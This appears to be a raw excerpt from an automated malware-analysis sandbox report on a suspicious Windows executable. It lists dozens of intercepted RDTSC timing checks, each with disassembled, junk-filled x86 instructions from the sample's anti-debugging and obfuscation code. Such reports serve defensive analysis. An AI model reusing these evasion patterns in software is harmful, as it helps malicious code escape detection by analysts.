Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E9F5 second address: 47E9FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47F41C second address: 47F420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47F420 second address: 47F47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FD1807ED552h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D2CD3h] 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D2F25h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FD1807ED548h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov si, bx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jnc 00007FD1807ED54Ch 0x00000046 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 481EA9 second address: 481EBB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FD180B5C156h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4842BE second address: 484377 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FD1807ED557h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FD1807ED548h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D2AAFh] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FD1807ED548h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov edi, dword ptr [ebp+122D2C1Bh] 0x00000053 push 00000000h 0x00000055 jo 00007FD1807ED55Ch 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e jmp 00007FD1807ED552h 0x00000063 popad 0x00000064 xchg eax, esi 0x00000065 jmp 00007FD1807ED555h 0x0000006a push eax 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jo 00007FD1807ED546h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 484377 second address: 48437B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4844E5 second address: 4844EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4844EC second address: 484507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 484507 second address: 48450D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4855CB second address: 4855CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4871AB second address: 4871B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4855CF second address: 4855E0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4871B1 second address: 4871B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4871B5 second address: 4871EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jng 00007FD180B5C169h 0x00000013 jmp 00007FD180B5C163h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4871EB second address: 4871EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 488276 second address: 4882E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FD180B5C158h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jnc 00007FD180B5C15Ch 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FD180B5C158h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov bx, ax 0x00000048 mov di, 24E3h 0x0000004c push 00000000h 0x0000004e mov edi, dword ptr [ebp+12463303h] 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007FD180B5C158h 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4873B2 second address: 4873B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48A4DD second address: 48A4E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD180B5C156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48B5DA second address: 48B5DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48C343 second address: 48C347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48C347 second address: 48C34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48C34B second address: 48C3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FD180B5C158h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jmp 00007FD180B5C165h 0x00000029 push 00000000h 0x0000002b cld 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FD180B5C158h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 movzx ebx, si 0x0000004b push eax 0x0000004c push ecx 0x0000004d je 00007FD180B5C15Ch 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48D355 second address: 48D359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48A7C3 second address: 48A7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48E50A second address: 48E517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48E517 second address: 48E51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48F287 second address: 48F2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 sub edi, dword ptr [ebp+122D3A88h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FD1807ED548h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push edi 0x0000002c xor dword ptr [ebp+122D2FC4h], ebx 0x00000032 pop ebx 0x00000033 push 00000000h 0x00000035 mov edi, 4BEB6400h 0x0000003a xchg eax, esi 0x0000003b jns 00007FD1807ED54Eh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jnl 00007FD1807ED548h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 491278 second address: 49127C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 49127C second address: 49128A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4301BD second address: 4301C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A0FB1 second address: 4A0FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A30BA second address: 4A30C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A30C0 second address: 4A30C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A32ED second address: 4A32F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A8328 second address: 4A8341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED555h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A8341 second address: 4A8347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A8347 second address: 4A834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4AF444 second address: 4AF489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FD180B5C156h 0x0000000b pop eax 0x0000000c jmp 00007FD180B5C166h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD180B5C165h 0x0000001a pushad 0x0000001b jp 00007FD180B5C156h 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 475EDA second address: 45CEAE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e call dword ptr [ebp+122D2EE9h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FD1807ED553h 0x0000001c jmp 00007FD1807ED54Bh 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 475F68 second address: 475F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DC5A second address: 47DC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 476479 second address: 47647F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 476721 second address: 47672A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47672A second address: 47672E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47672E second address: 476752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnc 00007FD1807ED553h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 476752 second address: 47676E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jnc 00007FD180B5C156h 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 477065 second address: 477069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 45D9EB second address: 45D9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B2D2B second address: 4B2D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B2D31 second address: 4B2D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B3453 second address: 4B3457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B3614 second address: 4B3618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B960F second address: 4B9615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B9615 second address: 4B9655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FD180B5C15Bh 0x0000000a jmp 00007FD180B5C15Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FD180B5C164h 0x00000018 jmp 00007FD180B5C15Eh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jo 00007FD180B5C156h 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B84B0 second address: 4B84B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D25 second address: 4B8D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D29 second address: 4B8D53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD1807ED558h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnl 00007FD1807ED546h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D53 second address: 4B8D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D59 second address: 4B8D67 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D67 second address: 4B8D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D6B second address: 4B8D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FD1807ED552h 0x00000010 jng 00007FD1807ED546h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D83 second address: 4B8D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD180B5C15Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8EB3 second address: 4B8EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8EBA second address: 4B8F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD180B5C15Ah 0x00000008 jmp 00007FD180B5C15Dh 0x0000000d jmp 00007FD180B5C15Eh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007FD180B5C163h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 42CA59 second address: 42CA6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 42CA6C second address: 42CA74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BEE8D second address: 4BEE9D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD1807ED546h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BEE9D second address: 4BEEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD180B5C169h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BF3E9 second address: 4BF3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BF3ED second address: 4BF40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD180B5C160h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BF574 second address: 4BF589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD1807ED550h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BF589 second address: 4BF59D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA48 second address: 4BFA65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FD1807ED546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD1807ED54Ch 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA65 second address: 4BFA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA6A second address: 4BFA9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD1807ED54Fh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD1807ED559h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA9A second address: 4BFA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA9E second address: 4BFAA8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BE340 second address: 4BE346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C238F second address: 4C23C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD1807ED556h 0x00000008 jmp 00007FD1807ED54Dh 0x0000000d popad 0x0000000e jno 00007FD1807ED548h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C23C7 second address: 4C23CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C23CE second address: 4C23E8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD1807ED54Eh 0x00000008 jbe 00007FD1807ED54Eh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C5391 second address: 4C5397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
